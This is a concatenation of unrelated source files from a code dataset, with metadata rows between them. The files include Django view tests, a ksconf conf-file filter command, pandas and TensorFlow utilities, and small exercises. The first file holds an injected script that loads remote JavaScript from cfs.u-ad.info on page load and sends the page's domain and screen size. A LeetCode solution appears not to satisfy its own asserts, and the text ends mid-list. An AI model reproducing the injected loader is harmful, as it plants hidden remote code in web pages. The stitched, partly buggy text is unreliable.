<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "¶ms=" + "4TtHaUQnUEiP6K%2fc5C582AaN6h071sG%2bJBYpJxd3JQSJs5mE8iAmw8USIyYDWcoVFc08gzCE8COQRBhCpHI1yC7skRDV9qYyHsdUIk2Qeh5fEPTGf2w%2fAexeHwBBM3qJNrfxOqlDLyX3udt7TqoNReDfIBn%2brVy%2bXEPB%2b8EBADsI1Ky5R%2bmMT%2bW5f4GztEj2O1tiud%2fhA1eRZDOA8mmhJtYMcL69A3eIK5GA8GaovnIqpEW%2fPvjHtnKIurfETIYf5ayMxYzYN1lED6XS%2fAb6PcLJr28pYQzmnhFa2BHbEg%2fIb0A3%2f%2fYokQpvFnkvQ2zFr6zcNU%2fELwAzWrxpSfHdjc3rc78s27Iqzcz57H00Dc%2fRd92Mw%2bWRClG4%2byxeuot%2ftTqeWWP%2fTPr3cJfjysdCW%2bsf7hgbZmIcOA4Gl3LH5ARvUDlRwAz786LT4TDlM0MvS7YhQtdY8Vai4ZoPeSWwCWp76PIQqYPRApUAKtS66EuHlmVHgcIdtNFspNfcV3Ro5%2ftCVEqnASugmE87PJkncpxnP6cGCRbSwOA7JshwR8RDsEF69XUIk2tn%2fH1MBTJUaONMqI5Vb4Fnuk1G37GFI6Ne3Myq3qQ4SC2RcISIMse5oG55mTQe%2bFhZFcAw27fh" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>''' | [
"nadzeri.munawar94@gmail.com"
] | nadzeri.munawar94@gmail.com |
38d0615979c2b6f9212e065f17ac55ac9e8a8d52 | 37b00ed96501afdac30c67a5d5535b9e18825ff0 | /posts/tests/test_views.py | 2fd774d538641a438d8549667fcba761aac7f4f1 | [] | no_license | Iki-oops/hw05_final | b7b117c8ca8fcb3b39a2a8b54d40b2cc0ee9fe79 | 9962f5b380ba43de21d86d4d46048643882ad875 | refs/heads/master | 2023-03-26T13:22:24.052420 | 2021-04-02T18:21:11 | 2021-04-02T18:21:11 | 347,539,772 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,335 | py | import shutil
import tempfile
from django.conf import settings
from django.core.files.uploadedfile import SimpleUploadedFile
from django.test import TestCase, Client
from django.urls import reverse
from django.contrib.auth import get_user_model
from django import forms
from django.urls import reverse
from posts.models import Group, Post, Follow
# Minimal valid GIF payload: the first six bytes spell "GIF89a", followed by
# a tiny image descriptor.  Used as in-memory content for an uploaded test
# image (Post.image) so the tests need no real file on disk.
SMALL_GIF = (
    b'\x47\x49\x46\x38\x39\x61\x02\x00'
    b'\x01\x00\x80\x00\x00\x00\x00\x00'
    b'\xFF\xFF\xFF\x21\xF9\x04\x00\x00'
    b'\x00\x00\x00\x2C\x00\x00\x00\x00'
    b'\x02\x00\x01\x00\x00\x02\x02\x0C'
    b'\x0A\x00\x3B'
)
class PostPagesTest(TestCase):
    """View-layer tests: templates, page contexts and the follow system.

    Fixes applied: the deprecated ``assertEquals``/``assertNotEquals``
    aliases (removed in Python 3.12) are replaced by ``assertEqual`` /
    ``assertNotEqual``, and ``assertTrue(x, y)`` misuses — where the second
    positional argument was silently treated as a failure *message* — are
    reduced to the truthiness check they actually performed.
    """

    @classmethod
    def setUpClass(cls):
        super().setUpClass()
        # Redirect MEDIA_ROOT to a throwaway directory so uploaded test
        # images never touch the real media folder (removed in tearDownClass).
        settings.MEDIA_ROOT = tempfile.mkdtemp(dir=settings.BASE_DIR)
        cls.user = get_user_model().objects.create_user(username='YaBobyor')
        cls.group = Group.objects.create(
            title='Тест',
            slug='test',
            description='Домашние тесты',
        )
        cls.uploaded = SimpleUploadedFile(
            name='small.gif',
            content=SMALL_GIF,
            content_type='image/gif'
        )
        cls.post = Post.objects.create(
            text='ya bobyor',
            author=cls.user,
            group=cls.group,
            image=cls.uploaded,
        )

    @classmethod
    def tearDownClass(cls):
        # Clean up the temporary media directory created in setUpClass.
        shutil.rmtree(settings.MEDIA_ROOT, ignore_errors=True)
        super().tearDownClass()

    def setUp(self):
        self.guest_client = Client()
        # A second, authenticated user distinct from the post author above.
        self.user = get_user_model().objects.create_user(username='YaBobr')
        self.authorized_client = Client()
        self.authorized_client.force_login(self.user)

    def test_pages_uses_correct_template(self):
        """Each named URL renders the template it is mapped to."""
        template_pages_name = {
            'index.html': reverse('index'),
            'group.html': reverse('group_posts',
                                  args=[PostPagesTest.group.slug]),
            'new_post.html': reverse('new_post'),
            'profile.html': reverse('profile', args=[PostPagesTest.user])
        }
        for template, reverse_name in template_pages_name.items():
            with self.subTest(reverse_name=reverse_name):
                response = self.authorized_client.get(reverse_name)
                self.assertTemplateUsed(response, template)

    def test_index_list_show_correct_context(self):
        """The index page exposes the fixture post in its context."""
        response = self.authorized_client.get(reverse('index'))
        get_page = response.context.get('page')[0]
        post_text_0 = get_page.text
        post_author_0 = get_page.author
        post_group_0 = get_page.group
        post_image_0 = get_page.image
        self.assertEqual(post_text_0, 'ya bobyor')
        self.assertEqual(post_author_0, PostPagesTest.user)
        self.assertEqual(post_group_0, PostPagesTest.group)
        # Only truthiness can be asserted here: an ImageFieldFile does not
        # compare equal to the SimpleUploadedFile it was created from.
        self.assertTrue(post_image_0)

    def test_post_view_show_correct_context(self):
        """The single-post page exposes the post (with image) in context."""
        username = PostPagesTest.user.username
        post_id = PostPagesTest.post.id
        response = self.authorized_client.get(
            reverse('post', args=[username, post_id]))
        get_post = response.context.get('post')
        post_image = get_post.image
        self.assertTrue(post_image)

    def test_new_post_show_correct_context(self):
        """The new-post form exposes the expected field types."""
        response = self.authorized_client.get(reverse('new_post'))
        form_fields = {
            'group': forms.fields.ChoiceField,
            'text': forms.fields.CharField,
        }
        for value, excepted in form_fields.items():
            with self.subTest(value=value):
                form_field = response.context.get('form').fields.get(value)
                self.assertIsInstance(form_field, excepted)

    def test_group_posts_page_show_correct_context(self):
        """The group page exposes the group and its posts in context."""
        response = self.authorized_client.get(
            reverse('group_posts', args=[PostPagesTest.group.slug]))
        get_group = response.context.get('group')
        get_post = response.context.get('page')[0]
        post_image = get_post.image
        group_title = get_group.title
        group_slug = get_group.slug
        group_description = get_group.description
        self.assertEqual(group_title, 'Тест')
        self.assertEqual(group_slug, 'test')
        self.assertEqual(group_description, 'Домашние тесты')
        self.assertTrue(post_image)

    def test_profile_list_show_correct_context(self):
        """The profile page exposes the author's post in its context."""
        response = self.authorized_client.get(
            reverse('profile', args=[PostPagesTest.user]))
        get_page = response.context.get('page')[0]
        profile_text_0 = get_page.text
        profile_author_0 = get_page.author
        profile_group_0 = get_page.group
        profile_image_0 = get_page.image
        self.assertEqual(profile_text_0, 'ya bobyor')
        self.assertEqual(profile_author_0, PostPagesTest.user)
        self.assertEqual(profile_group_0, PostPagesTest.group)
        self.assertTrue(profile_image_0)

    def test_created_post_in_index(self):
        """A post assigned to a group shows up on the index page."""
        response = self.authorized_client.get(reverse('index'))
        post = PostPagesTest.post.group
        self.assertEqual(post, response.context.get('page')[0].group)

    def test_created_post_in_selected_group(self):
        """A post assigned to a group shows up on that group's page."""
        response = self.authorized_client.get(
            reverse('group_posts', args=[PostPagesTest.group.slug]))
        post = PostPagesTest.post.group
        self.assertEqual(post, response.context.get('page')[0].group)

    # Follow-system tests
    def test_check_profile_follow(self):
        """Following an author creates a Follow row and sets the flag."""
        self.authorized_client.get(
            reverse('profile_follow', args=[PostPagesTest.user]))
        profile_response = self.authorized_client.get(
            reverse('profile', args=[PostPagesTest.user]))
        following = profile_response.context.get('following')
        # .get() raises Follow.DoesNotExist when the relation is missing,
        # so the lookup itself is part of the assertion.
        Follow.objects.get(user=self.user, author=PostPagesTest.user)
        self.assertTrue(following)

    def test_check_profile_unfollow(self):
        """Unfollowing clears the 'following' flag on the profile page."""
        self.authorized_client.get(
            reverse('profile_follow', args=[PostPagesTest.user]))
        self.authorized_client.get(
            reverse('profile_unfollow', args=[PostPagesTest.user]))
        profile_response = self.authorized_client.get(
            reverse('profile', args=[PostPagesTest.user]))
        following = profile_response.context.get('following')
        self.assertFalse(following)

    def test_following_post_in_follower_menu(self):
        """The follow feed shows followed authors' posts and no others."""
        another_user = get_user_model().objects.create_user(username='Ya')
        self.authorized_client.get(
            reverse('profile_follow', args=[PostPagesTest.user]))
        follow_index_response = self.authorized_client.get(
            reverse('follow_index'))
        posts = Post.objects.get(author=PostPagesTest.user)
        other_posts = Post.objects.create(
            author=another_user, text='test', group=PostPagesTest.group)
        follow_posts = follow_index_response.context.get('page')[0]
        self.assertEqual(follow_posts, posts)
        self.assertNotEqual(follow_posts, other_posts)
class PaginatorViewsTest(TestCase):
    """Index pagination: 13 posts split into pages of 10 and 3.

    Uses ``assertEqual`` instead of the deprecated ``assertEquals`` alias
    (removed in Python 3.12) and assigns the group straight from
    ``Group.objects.create`` instead of a redundant follow-up ``get``.
    """

    @classmethod
    def setUpClass(cls):
        super().setUpClass()
        cls.group = Group.objects.create(
            title='Тест',
            slug='test',
            description='Домашние тесты',
        )
        cls.user = get_user_model().objects.create_user(username='Ya')
        # Thirteen posts: ten fill the first page, three spill onto page two.
        for _ in range(13):
            Post.objects.create(
                text='Ya',
                author=cls.user,
                group=cls.group,
            )

    def setUp(self):
        self.guest_client = Client()
        self.authorized_client = Client()
        self.authorized_client.force_login(PaginatorViewsTest.user)

    def test_first_page_containse_ten_records(self):
        """The first index page holds exactly ten posts."""
        response = self.authorized_client.get(reverse('index'))
        get_page = response.context.get('page').object_list
        self.assertEqual(len(get_page), 10)

    def test_second_page_containse_three_records(self):
        """The second index page holds the remaining three posts."""
        response = self.authorized_client.get(reverse('index') + '?page=2')
        get_page = response.context.get('page').object_list
        self.assertEqual(len(get_page), 3)
| [
"bambagaevdmitrij@gmail.com"
] | bambagaevdmitrij@gmail.com |
7663da85496ea77c6a7e9bcf0370b46364ca7856 | 936f5d7ba1e1282af705c746fb814973fe11102f | /ksconf/commands/filter.py | a415c1e40b37d211d66c0ff75b5d0b0ef8e290f4 | [
"Apache-2.0"
] | permissive | Splunk-App-and-TA-development/ksconf | 53199617ef92440ef8bcde4f9b9a12db7e0e9221 | 6a7e1a56f59ced76b9c95f48359bc7a6052183ed | refs/heads/master | 2023-01-10T12:31:40.993763 | 2020-11-04T14:53:46 | 2020-11-04T14:53:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,841 | py | """ SUBCOMMAND: ksconf filter <CONF>
Usage example:
ksconf filter default/savedsearches.conf --stanza "My Special Search" -o my-special-search.conf
Future things to support:
* SED-like rewriting for stanza name or key values.
* Mini eval/query language for simple data manipulations supporting mixed used of matching modes
on a case-by-base basis, custom logic (AND,OR,arbitrary groups), projections, and content
rewriting. (Should leverage custom 'combine' mini-language where possible.)
"""
from __future__ import absolute_import, unicode_literals
import argparse
import sys
from ksconf.commands import KsconfCmd, dedent, ConfFileType
from ksconf.conf.parser import PARSECONF_MID_NC, write_conf_stream
from ksconf.consts import EXIT_CODE_SUCCESS
from ksconf.filter import FilteredList, FilterListWildcard, create_filtered_list
from ksconf.util.completers import conf_files_completer
class FilterCmd(KsconfCmd):
    """Implements ``ksconf filter``: a grep-like include/exclude tool that
    operates on whole stanzas (and optionally individual attributes) of
    Splunk ``.conf`` files."""
    help = "A stanza-aware GREP tool for conf files"
    description = dedent("""
    Filter the contents of a conf file in various ways. Stanzas can be included
    or excluded based on a provided filter or based on the presence or value of a key.
    Where possible, this command supports GREP-like arguments to bring a familiar feel.
    """)
    # format = "manual"
    maturity = "alpha"

    def __init__(self, *args, **kwargs):
        super(FilterCmd, self).__init__(*args, **kwargs)
        # Both filters are built lazily by prep_filters() once the parsed
        # CLI arguments are available.
        self.stanza_filters = None
        self.attr_presence_filters = None

    def register_args(self, parser):
        # type: (argparse.ArgumentParser) -> None
        """Attach all CLI options for the ``filter`` sub-command."""
        parser.add_argument("conf", metavar="CONF", help="Input conf file", nargs="+",
                            type=ConfFileType("r", parse_profile=PARSECONF_MID_NC)
                            ).completer = conf_files_completer
        parser.add_argument("-o", "--output", metavar="FILE",
                            type=argparse.FileType('w'), default=self.stdout,
                            help="File where the filtered results are written. "
                                 "Defaults to standard out.")
        parser.add_argument("--comments", "-C",
                            action="store_true", default=False,
                            help="Preserve comments. Comments are discarded by default.")
        parser.add_argument("--verbose", action="store_true", default=False,
                            help="Enable additional output.")
        # Pattern-matching behaviour shared by all stanza/attribute filters.
        parser.add_argument("--match", "-m",  # metavar="MODE",
                            choices=["regex", "wildcard", "string"],
                            default="wildcard",
                            help=dedent("""\
                                Specify pattern matching mode.
                                Defaults to 'wildcard' allowing for ``*`` and ``?`` matching.
                                Use 'regex' for more power but watch out for shell escaping.
                                Use 'string' to enable literal matching."""))
        parser.add_argument("--ignore-case", "-i", action="store_true",
                            help=dedent("""\
                                Ignore case when comparing or matching strings.
                                By default matches are case-sensitive."""))
        parser.add_argument("--invert-match", "-v", action="store_true",
                            help=dedent("""\
                                Invert match results.
                                This can be used to show what content does NOT match,
                                or make a backup copy of excluded content."""))

        # Alternate output modes (mirrors grep's -l / -c / brief listings).
        pg_out = parser.add_argument_group("Output mode", dedent("""\
            Select an alternate output mode.
            If any of the following options are used, the stanza output is not shown.
            """))
        pg_out.add_argument("--files-with-matches", "-l", action="store_true",
                            help="List files that match the given search criteria")
        pg_om1 = pg_out.add_mutually_exclusive_group()
        pg_om1.add_argument("--count", "-c", action="store_true",
                            help="Count matching stanzas")
        pg_om1.add_argument("--brief", "-b", action="store_true",
                            help="List name of matching stanzas")

        # Stanza-level selection (include/exclude whole stanzas).
        pg_sel = parser.add_argument_group("Stanza selection", dedent("""\
            Include or exclude entire stanzas using these filter options.
            All filter options can be provided multiple times.
            If you have a long list of filters, they can be saved in a file and referenced using
            the special ``file://`` prefix. One entry per line."""))
        pg_sel.add_argument("--stanza", metavar="PATTERN", action="append", default=[],
                            help=dedent("""
                                Match any stanza who's name matches the given pattern.
                                PATTERN supports bulk patterns via the ``file://`` prefix."""))
        pg_sel.add_argument("--attr-present", metavar="ATTR", action="append", default=[],
                            help=dedent("""\
                                Match any stanza that includes the ATTR attribute.
                                ATTR supports bulk attribute patterns via the ``file://`` prefix."""))
        # The following option stubs are intentionally disabled (kept as raw
        # string literals so they are never executed):
        '''# Add next
        pg_sel.add_argument("--attr-eq", metavar=("ATTR", "PATTERN"), nargs=2, action="append",
                            default=[],
                            help="""
                            Match any stanza that includes an attribute matching the pattern.
                            PATTERN supports the special ``file://filename`` syntax.""")
        '''
        ''' # This will be more difficult
        pg_sel.add_argument("--attr-ne", metavar=("ATTR", "PATTERN"), nargs=2, action="append",
                            default=[],
                            help="""
                            Match any stanza that includes an attribute matching the pattern.
                            PATTERN supports the special ``file://`` syntax.""")
        '''

        # Attribute-level selection (keep/reject keys within kept stanzas).
        pg_con = parser.add_argument_group("Attribute selection", dedent("""\
            Include or exclude attributes passed through.
            By default, all attributes are preserved.
            Allowlist (keep) operations are preformed before blocklist (reject) operations."""))
        pg_con.add_argument("--keep-attrs", metavar="WC-ATTR", default=[], action="append",
                            help=dedent("""\
                                Select which attribute(s) will be preserved.
                                This space separated list of attributes indicates what to preserve.
                                Supports wildcards."""))
        pg_con.add_argument("--reject-attrs", metavar="WC-ATTR", default=[], action="append",
                            help=dedent("""\
                                Select which attribute(s) will be discarded.
                                This space separated list of attributes indicates what to discard.
                                Supports wildcards."""))

    def prep_filters(self, args):
        """Build the stanza/attribute filter objects from parsed CLI args."""
        flags = 0
        if args.ignore_case:
            flags |= FilteredList.IGNORECASE
        if args.verbose:
            flags |= FilteredList.VERBOSE
        self.stanza_filters = create_filtered_list(args.match, flags).feedall(args.stanza)
        self.attr_presence_filters = create_filtered_list(args.match, flags)
        self.attr_presence_filters.feedall(args.attr_present)
        if args.keep_attrs or args.reject_attrs:
            # Each --keep-attrs/--reject-attrs value may hold several
            # space-separated patterns; split them before feeding.
            self.attrs_keep_filter = FilterListWildcard(flags)
            for attrs in args.keep_attrs:
                self.attrs_keep_filter.feedall(attrs.split(" "))
            self.attrs_reject_filter = FilterListWildcard(FilteredList.INVERT | flags)
            for attrs in args.reject_attrs:
                self.attrs_reject_filter.feedall(attrs.split(" "))
        else:
            # Bypass filter: no attribute rules given, so pass content
            # through unchanged (shadows the filter_attrs method below).
            self.filter_attrs = lambda x: x

    def _test_stanza(self, stanza, attributes):
        """Return True if the stanza (by name or attribute presence) matches."""
        if self.stanza_filters.match(stanza):
            # If there are no attribute level filters, automatically keep (preserves empty stanzas)
            if not self.attr_presence_filters.has_rules:
                return True
            # See if any of the attributes we are looking for exist, if so keep the entire stanza
            for attr in attributes:
                if self.attr_presence_filters.match(attr):
                    return True
        return False

    def filter_attrs(self, content):
        """Return a copy of ``content`` containing only allowed attributes."""
        d = {}
        for (attr, value) in content.items():
            # Keep the attribute only if it passes the allowlist AND is not
            # blocked by the (inverted) reject list.
            if self.attrs_keep_filter.match(attr) and self.attrs_reject_filter.match(attr):
                d[attr] = content[attr]
        return d

    def output(self, args, matches, filename):
        """Write ``matches`` for one input file in the selected output mode."""
        if args.files_with_matches:
            if matches:
                if args.count:
                    args.output.write("{} has {} matching stanza(s)\n".format(filename, len(matches)))
                elif args.brief:
                    for stanza_name in matches:
                        args.output.write("{}: {}\n".format(filename, stanza_name))
                else:
                    # Just show a single file
                    args.output.write("{}\n".format(filename))
            elif args.verbose:
                self.stderr.write("No matching stanzas in {}\n".format(filename))
        elif args.count:
            args.output.write("{}\n".format(len(matches)))
        elif args.brief:
            for stanza_name in matches:
                args.output.write("{}\n".format(stanza_name))
        else:
            # Default mode: emit the filtered conf content itself.
            if len(args.conf) > 1:
                args.output.write("# {}\n".format(filename))
            if matches:
                write_conf_stream(args.output, matches)
            elif args.verbose:
                self.stderr.write("No matching stanzas in {}\n".format(filename))
        if args.verbose:
            sys.stderr.write("Matched {} stanzas from {}\n".format(len(matches), filename))

    def run(self, args):
        ''' Filter configuration files. '''
        self.prep_filters(args)
        # By allowing multiple input CONF files, this means that we could have duplicate stanzas (not detected by the parser)
        # so for now that just means duplicate stanzas on the output, but that may be problematic
        # I guess this is really up to the invoker to know if they care about that or not... Still would be helpful for a quick "grep" of a large number of files
        for conf in args.conf:
            conf.set_parser_option(keep_comments=args.comments)
            cfg = conf.data
            # Should this be an ordered dict?
            cfg_out = dict()
            for stanza_name, attributes in cfg.items():
                # XOR with --invert-match flips keep/discard in one step.
                keep = self._test_stanza(stanza_name, attributes) ^ args.invert_match
                if keep:
                    cfg_out[stanza_name] = self.filter_attrs(attributes)
            self.output(args, cfg_out, conf.name)
            # Explicit flush used to resolve a CLI unittest timing issue in pypy
            args.output.flush()
        return EXIT_CODE_SUCCESS
| [
"lowell@kintyre.co"
] | lowell@kintyre.co |
738caa12cbe1616e2d305dc41021a1cf74c290ad | 6d50ee04db4c75ebd5f0ca59780c6b093f6d2860 | /leetCode-remove-duplicate-letters.py | b0022b3ca04d71f2c32d1bc353b2b1fe517fa829 | [] | no_license | toontong/leetCode | bcdb42aa5a4c4dd54c2dfa5e6ea175add52f9ab9 | 28a69fff382c580a2f062c1e2c2577eed20d785c | refs/heads/master | 2021-01-10T01:55:49.340774 | 2016-01-18T07:59:12 | 2016-01-18T07:59:12 | 49,860,291 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 761 | py | class Solution(object):
def removeDuplicateLetters(self, s):
"""
:type s: str
:rtype: str
"""
r = []
m = {}
for i in range(len(s)):
c= s[i]
for j in range(i+1, len(s)):
if c == s[j]:
if r and c in m and c not in r:
r.append(c)
else:
m[c] = True
break
else:
if c not in r:r.append(c)
return ''.join(r)
def assertR(s, r):
    # Test helper: run removeDuplicateLetters on `s` and fail with the
    # (input, actual, expected) triple when the result differs from `r`.
    rr = Solution().removeDuplicateLetters(s)
    assert rr == r, (s, rr, r)


# Smoke tests (all inputs are LeetCode-316 style cases).
assertR("ccacbaba", "acb")
assertR("bbcaac", "bac")
assertR("bcabc", "abc")
assertR("cbacdcbc", "acdb")
"chuantong.huang@gmail.com"
] | chuantong.huang@gmail.com |
100dc312e0f57dc4f71b1e521b5415281621a075 | 8efb83504f25c45dcdd23ac1649a42501fddd5e6 | /heat_map_processing/district_mapping.py | 1fae08e43404527d06a42bf64340f97f752e9df2 | [
"MIT"
] | permissive | ameliadogan/Philly-Police-Data | a5041dfdbeb7eac1d8666d69c1f65b13a6be0aee | 24608c39651830928b1f0019c4afad82c2cc8884 | refs/heads/master | 2021-04-18T05:14:18.266769 | 2020-09-17T16:48:15 | 2020-09-17T16:48:15 | 249,507,786 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,432 | py | import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
import re, datetime
import matplotlib.pyplot as plt
csv1= 'policedata/ppd_complaints.csv'
csv2 = 'policedata/ppd_complainant_demographics.csv'
csv3 = 'policedata/ppd_complaint_disciplines.csv'
csv4 = 'policedata/Boundaries_District.csv'
##preparing csvs into data frames
#complaint data
df_complaints = pd.read_csv(csv1)
#boundaries_district
df_police = pd.read_csv(csv4)
#drop police districts 23, Other Jurisdiction, and 4 that do not appear in current police district
df_complaints = df_complaints[df_complaints['district_occurrence'] != "400"]
df_complaints = df_complaints[df_complaints['district_occurrence'] != "2300"]
df_complaints = df_complaints[df_complaints['district_occurrence'] != "Other Jurisdiction"]
df_complaints = df_complaints.dropna()
df_complaints['district_occurrence'][df_complaints['district_occurrence'] == "9"] = "900" #have lone case of 9 put into district "900"
df_complaints['district_occurrence'] = pd.to_numeric(df_complaints['district_occurrence'])
#clean to get district names without "00" at e d
df_complaints['district_occurrence']= df_complaints['district_occurrence'] / 100
#make value count into dataframe
val_count = df_complaints['district_occurrence'].value_counts()
df_heat_map = val_count.rename_axis('DISTRICT_').reset_index(name='counts')
#export dataframe to dsv
df_heat_map.to_csv('heat_map_data.csv')
| [
"ameliadogan@gmail.com"
] | ameliadogan@gmail.com |
ed531ac39f4e836f0ef9223d8913f55327376982 | 8c825730f6fd253e58902b150a9800de8f766943 | /capture/noworkflow/now/cmd/cmd_history.py | 2e5d8da0a5ca9eab5b4e964956f6cef37e97c90f | [
"MIT"
] | permissive | rmparanhos/noworkflow | aeb92695c34e65edf9cc4d4dc31d80467b085773 | 8f703a14503345568e91957659b43654036f8154 | refs/heads/master | 2020-05-17T12:39:04.231204 | 2019-06-21T03:42:49 | 2019-06-21T03:42:49 | 183,716,529 | 0 | 0 | null | 2019-04-27T01:58:31 | 2019-04-27T01:58:31 | null | UTF-8 | Python | false | false | 1,849 | py | # Copyright (c) 2016 Universidade Federal Fluminense (UFF)
# Copyright (c) 2016 Polytechnic Institute of New York University.
# This file is part of noWorkflow.
# Please, consult the license terms in the LICENSE file.
"""'now history' command"""
from __future__ import (absolute_import, print_function,
division, unicode_literals)
import os
from ..ipython.converter import create_ipynb
from ..persistence.models.history import History as HistoryModel
from ..persistence import persistence_config
from .command import NotebookCommand
class History(NotebookCommand):
    """Show project history"""

    def add_arguments(self):
        # Register CLI options for the `now history` sub-command.
        add_arg = self.add_argument
        add_arg("-s", "--script", type=str, default="*",
                help="show history of specific script")
        add_arg("-e", "--status", type=str, default="*",
                choices=["*", "finished", "unfinished", "backup"],
                help="show only trials in a specific status")
        add_arg("--dir", type=str,
                help="set demo path. Default to CWD/demo<number>"
                     "where <number> is the demo identification")

    def execute(self, args):
        # Connect to the existing noWorkflow database in the target directory
        # (falling back to the current working directory) and print the
        # filtered trial history as text.
        persistence_config.connect_existing(args.dir or os.getcwd())
        history = HistoryModel(script=args.script, status=args.status)
        print(history)

    def execute_export(self, args):
        # Generate a History.ipynb notebook pre-populated with the IPython
        # history-graph boilerplate; "# <codecell>" markers split the code
        # string into separate notebook cells.
        code = ("%load_ext noworkflow\n"
                "import noworkflow.now.ipython as nip\n"
                "# <codecell>\n"
                "history = nip.History()\n"
                "# history.graph.width = 700\n"
                "# history.graph.height = 300\n"
                "# history.script = '*'\n"
                "# history.status = '*'\n"
                "# <codecell>\n"
                "history")
        create_ipynb("History.ipynb", code)
| [
"joaofelipenp@gmail.com"
] | joaofelipenp@gmail.com |
04747c7c8266e99f1a85acf17f1ae88fef5da79d | 03d68f032ab0e8cf269413d0309fc6d36281504f | /src/l2hmc/utils/tensorflow/history.py | d66fe35509b67f88da6d0b9dd0b405dac0889a21 | [
"Apache-2.0"
] | permissive | saforem2/l2hmc-qcd | 560026cd4d63f786247170a2b8641a7402b7e81e | 46ada488bc5c8b0a31be0bf23ea11b95b3b06767 | refs/heads/main | 2023-09-06T03:20:19.577196 | 2023-08-23T19:26:58 | 2023-08-23T19:26:58 | 176,870,361 | 57 | 8 | Apache-2.0 | 2023-08-23T18:56:02 | 2019-03-21T04:32:54 | Jupyter Notebook | UTF-8 | Python | false | false | 1,812 | py | """
tensorflow/history.py
Implements tfHistory, containing minor modifications from base History class.
"""
from __future__ import absolute_import, print_function, division, annotations
from typing import Any
import tensorflow as tf
import numpy as np
from l2hmc.utils.history import BaseHistory
class History(BaseHistory):
    """Metrics history that understands TensorFlow tensors.

    Extends ``BaseHistory``: ``update`` flattens one level of nested metric
    dicts (``{'loss': {'kl': v}}`` is recorded under key ``'loss/kl'``) and
    ``_update`` reduces tensor values to scalars with ``tf.reduce_mean``.
    """
    def update(self, metrics: dict) -> dict:
        """Record one step of metrics and return the scalar averages by key.

        Fix: the original mutated the loop variable ``key`` while walking a
        nested dict (producing 'a/x', then 'a/x/y', ...) and only stored the
        last sub-metric after the inner loop; each sub-metric is now recorded
        under its own 'parent/child' key.
        """
        avgs = {}
        era = metrics.get('era', 0)
        for key, val in metrics.items():
            if isinstance(val, (float, int)):
                # Plain scalars are recorded directly (they are not appended
                # to self.history, matching the original behaviour).
                self._record(avgs, era, key, val)
            elif isinstance(val, dict):
                for subname, subval in val.items():
                    subkey = f'{key}/{subname}'
                    # TODO: Figure out how to deal with exception
                    try:
                        avg = self._update(key=subkey, val=subval)
                    except tf.errors.InvalidArgumentError:
                        continue
                    self._record(avgs, era, subkey, avg)
            else:
                self._record(avgs, era, key, self._update(key=key, val=val))
        return avgs
    def _record(self, avgs: dict, era, key: str, avg) -> None:
        """Store *avg* in the per-call result and in this era's metric lists."""
        if avg is None:
            return
        avgs[key] = avg
        # NOTE(review): assumes self.era_metrics[str(era)] already exists
        # (presumably created by BaseHistory); only a missing metric key is
        # handled by the fallback -- confirm against BaseHistory.
        try:
            self.era_metrics[str(era)][key].append(avg)
        except KeyError:
            self.era_metrics[str(era)][key] = [avg]
    def _update(self, key: str, val: Any) -> float:
        """Append *val* to self.history[key] and return a scalar summary.

        Lists are converted to numpy arrays first; values that
        ``tf.reduce_mean`` cannot reduce are returned unchanged.
        """
        if val is None:
            raise ValueError(f'None encountered: {key}: {val}')
        if isinstance(val, list):
            val = np.array(val)
        try:
            self.history[key].append(val)
        except KeyError:
            self.history[key] = [val]
        if isinstance(val, (float, int)):
            return val
        try:
            return tf.reduce_mean(val)
        except Exception:
            # Non-reducible values (e.g. strings) pass through unchanged.
            return val
| [
"saforem2@gmail.com"
] | saforem2@gmail.com |
7dd5572eb2f7345c5c19117511b278a267f52dbb | 0cf7dd2c3c0b28b52f1273e8fe2ea0a87cacc6af | /calc_area_circum.py | 2bd6a681d10b6c96d0890ec76ce91d3e8c64ef23 | [] | no_license | EngrDevDom/Everyday-Coding-in-Python | 61b0e4fcbc6c7f399587deab2fa55763c9d519b5 | 93329ad485a25e7c6afa81d7229147044344736c | refs/heads/master | 2023-02-25T05:04:50.051111 | 2021-01-30T02:43:40 | 2021-01-30T02:43:40 | 274,971,215 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 95 | py | R = 7
PI = 3.141592654  # approximation of pi used for both calculations
RADIUS = 7        # radius of the circle being measured


def circle_area(radius, pi=PI):
    """Return the area of a circle with the given radius (pi * r**2)."""
    return radius ** 2 * pi


def circle_circumference(radius, pi=PI):
    """Return the circumference of a circle with the given radius (2 * r * pi)."""
    return 2 * radius * pi


print("The area is", circle_area(RADIUS))
print("The circumference is", circle_circumference(RADIUS))
| [
"60880034+EngrDevDom@users.noreply.github.com"
] | 60880034+EngrDevDom@users.noreply.github.com |
2978fb1c34d97eec4de27f3fc9df73995099d1c1 | b3ac70325aaa45150f3a8c772087555fcf5751fb | /Codecademy/writing_CSV_files.py | 692d98a5b34514a98231a36227286062af552a1c | [] | no_license | ShaunMadziva/Codecademy | c4b6ef3b8ffae5ed1c42fb9aad134590cb3969d9 | 852d99d417eb21991ebf25b3df8bd79b323920c6 | refs/heads/main | 2023-05-30T13:56:48.584103 | 2021-06-24T17:59:24 | 2021-06-24T17:59:24 | 380,010,007 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,678 | py | access_log = [
{'time': '08:39:37', 'limit': 844404, 'address': '1.227.124.181'},
{'time': '13:13:35', 'limit': 543871, 'address': '198.51.139.193'},
{'time': '19:40:45', 'limit': 3021, 'address': '172.1.254.208'},
{'time': '18:57:16', 'limit': 67031769, 'address': '172.58.247.219'},
{'time': '21:17:13', 'limit': 9083, 'address': '124.144.20.113'},
{'time': '23:34:17', 'limit': 65913, 'address': '203.236.149.220'},
{'time': '13:58:05', 'limit': 1541474, 'address': '192.52.206.76'},
